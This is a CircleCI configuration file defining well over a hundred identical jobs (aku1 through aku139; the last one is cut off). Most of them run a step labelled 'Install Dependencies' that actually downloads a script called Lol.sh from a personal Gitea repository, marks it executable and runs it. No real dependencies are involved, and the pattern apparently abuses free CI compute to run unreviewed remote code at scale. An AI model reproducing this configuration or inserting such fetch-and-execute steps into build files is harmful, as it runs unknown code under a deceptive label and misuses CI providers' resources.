version: 2
jobs:
    aku1:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku2:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku3:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku4:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku5:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku6:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku7:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku8:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku9:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku10:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku11:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku12:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku13:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku14:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku15:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku16:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku17:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku18:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku19:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku20:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku21:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku22:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku23:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku24:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku25:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku26:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku27:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku28:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku29:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku30:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku31:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku32:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku33:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku34:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku35:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku36:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku37:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku38:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku39:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku40:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku41:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku42:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku43:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku44:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku45:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku46:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku47:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku48:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku49:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku50:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku51:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku52:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku53:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku54:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku55:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku56:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku57:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku58:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku59:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku60:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku61:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku62:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku63:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku64:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku65:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku66:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku67:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku68:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku69:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku70:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku71:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku72:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku73:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku74:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku75:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku76:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku77:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku78:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku79:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku80:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku81:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku82:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku83:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku84:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku85:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku86:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku87:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku88:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku89:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku90:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku91:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku92:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku93:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku94:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku95:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku96:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku97:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku98:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku99:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku100:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku101:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku102:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku103:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku104:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku105:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku106:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku107:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku108:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku109:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku110:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku111:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku112:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku113:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku114:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku115:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku116:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku117:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku118:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku119:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku120:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku121:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku122:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku123:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku124:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku125:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku126:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku127:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku128:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku129:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku130:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku131:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku132:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku133:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku134:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku135:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku136:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku137:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku138:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku139:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
